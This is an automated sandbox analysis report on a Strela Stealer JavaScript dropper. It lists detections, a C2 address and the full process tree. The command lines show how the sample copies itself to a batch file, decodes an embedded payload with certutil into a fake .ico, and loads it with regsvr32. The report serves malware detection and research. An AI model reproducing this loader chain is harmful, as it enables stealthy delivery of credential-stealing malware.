Edit tour

Windows Analysis Report
1239840531439025921.js

Overview

General Information

Sample name:	1239840531439025921.js
Analysis ID:	1417023
MD5:	f06bb1a7df51df32d783b34f92d9b66a
SHA1:	b687119329ce2407964f5230baf368d76073a8e1
SHA256:	84e1edd28a73544499787540829363608648e12c3f3f2955ab2fb3b1af1d1e05
Infos:

Detection

Strela Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Powershell launch regsvr32

Yara detected Strela Stealer

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Yara detected EXE embedded in BAT file

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Scripting/CommandLine Process Spawned Regsvr32

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6560 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1239840531439025921.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 6684 cmdline: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3808 cmdline: wmic path win32_operatingsystem get oslanguage MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

find.exe (PID: 6368 cmdline: find /i "1033" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

findstr.exe (PID: 5076 cmdline: findstr /V flyutopianobedient ""C:\Users\user\\mindtrembleopen.bat"" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

certutil.exe (PID: 4416 cmdline: certutil -f -decode astonishinglewdselective muddledfreedesert.ico MD5: F17616EC0522FC5633151F7CAA278CAA)

powershell.exe (PID: 6680 cmdline: powershell regsvr32 muddledfreedesert.ico MD5: 04029E121A0CFA5991749937DD22A1D9)

regsvr32.exe (PID: 6372 cmdline: "C:\Windows\system32\regsvr32.exe" muddledfreedesert.ico MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

cleanup

Malware Configuration

Threatname: Strela Stealer

{"C2 url": "45.9.74.12/server.php"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
1239840531439025921.js	JoeSecurity_EXEembeddedinBATfile	Yara detected EXE embedded in BAT file	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\mindtrembleopen.bat	JoeSecurity_EXEembeddedinBATfile	Yara detected EXE embedded in BAT file	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.1707250298.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
Process Memory Space: regsvr32.exe PID: 6372	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
8.2.regsvr32.exe.7ffe1023e734.1.unpack	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
8.2.regsvr32.exe.7ffe1023e734.1.raw.unpack	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
8.2.regsvr32.exe.7ffe10230000.0.unpack	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\regsvr32.exe" muddledfreedesert.ico, CommandLine: "C:\Windows\system32\regsvr32.exe" muddledfreedesert.ico, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: powershell regsvr32 muddledfreedesert.ico, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6680, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" muddledfreedesert.ico, ProcessId: 6372, ProcessName: regsvr32.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1239840531439025921.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1239840531439025921.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1239840531439025921.js", ProcessId: 6560, ProcessName: wscript.exe

Sigma detected: Scripting/CommandLine Process Spawned Regsvr32

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\regsvr32.exe" muddledfreedesert.ico, CommandLine: "C:\Windows\system32\regsvr32.exe" muddledfreedesert.ico, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: powershell regsvr32 muddledfreedesert.ico, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6680, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" muddledfreedesert.ico, ProcessId: 6372, ProcessName: regsvr32.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat", CommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1239840531439025921.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6560, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat", ProcessId: 6684, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1239840531439025921.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1239840531439025921.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1239840531439025921.js", ProcessId: 6560, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell regsvr32 muddledfreedesert.ico, CommandLine: powershell regsvr32 muddledfreedesert.ico, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6684, ParentProcessName: cmd.exe, ProcessCommandLine: powershell regsvr32 muddledfreedesert.ico, ProcessId: 6680, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Powershell launch regsvr32

Source: Process started

Author: Joe Security: Data: Command: powershell regsvr32 muddledfreedesert.ico, CommandLine: powershell regsvr32 muddledfreedesert.ico, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6684, ParentProcessName: cmd.exe, ProcessCommandLine: powershell regsvr32 muddledfreedesert.ico, ProcessId: 6680, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: 45.9.74.12/server.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 8.2.regsvr32.exe.7ffe10230000.0.unpack

Malware Configuration Extractor: Strela Stealer {"C2 url": "45.9.74.12/server.php"}

Multi AV Scanner detection for domain / URL

Source: 45.9.74.12/server.php

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for submitted file

Source: 1239840531439025921.js

Virustotal: Detection: 35%

Perma Link

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.9.74.12/server.php

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 muddledfreedesert.ico
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 muddledfreedesert.ico	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_02481240	8_2_02481240
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0248EE88	8_2_0248EE88
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_02481740	8_2_02481740
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_02486C5C	8_2_02486C5C

Source: 1239840531439025921.js

Initial sample: Strings found which are bigger than 50

Source: muddledfreedesert.ico.6.dr

Static PE information: Number of sections : 19 > 10

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winJS@16/7@0/0

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\mindtrembleopen.bat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjllnkuc.i0s.ps1

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1239840531439025921.js

Virustotal: Detection: 35%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1239840531439025921.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_operatingsystem get oslanguage
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "1033"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V flyutopianobedient ""C:\Users\user\\mindtrembleopen.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode astonishinglewdselective muddledfreedesert.ico
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 muddledfreedesert.ico
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" muddledfreedesert.ico
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_operatingsystem get oslanguage	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "1033"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V flyutopianobedient ""C:\Users\user\\mindtrembleopen.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode astonishinglewdselective muddledfreedesert.ico	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 muddledfreedesert.ico	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" muddledfreedesert.ico	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell");IHost.ScriptFullName();IWshShell3.Run("cmd /k copy "C:\Users\user\Desktop\1239840531439025921.js" "%userprofile%", "0", "false")

Yara detected EXE embedded in BAT file

Source: Yara match	File source: 1239840531439025921.js, type: SAMPLE
Source: Yara match	File source: C:\Users\user\mindtrembleopen.bat, type: DROPPED

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFE102314B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_00007FFE102314B0

Source: muddledfreedesert.ico.6.dr	Static PE information: section name: /4
Source: muddledfreedesert.ico.6.dr	Static PE information: section name: .xdata
Source: muddledfreedesert.ico.6.dr	Static PE information: section name: /14
Source: muddledfreedesert.ico.6.dr	Static PE information: section name: /29
Source: muddledfreedesert.ico.6.dr	Static PE information: section name: /41
Source: muddledfreedesert.ico.6.dr	Static PE information: section name: /55
Source: muddledfreedesert.ico.6.dr	Static PE information: section name: /67
Source: muddledfreedesert.ico.6.dr	Static PE information: section name: /80
Source: muddledfreedesert.ico.6.dr	Static PE information: section name: /91

Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0248B542 push esp; ret	8_2_0248B545
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0248C5CC push cs; ret	8_2_0248C5CD
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_0248C5EF push esp; ret	8_2_0248C5F5

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\user\muddledfreedesert.ico

Jump to dropped file

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\user\muddledfreedesert.ico

Jump to dropped file

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\user\muddledfreedesert.ico

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

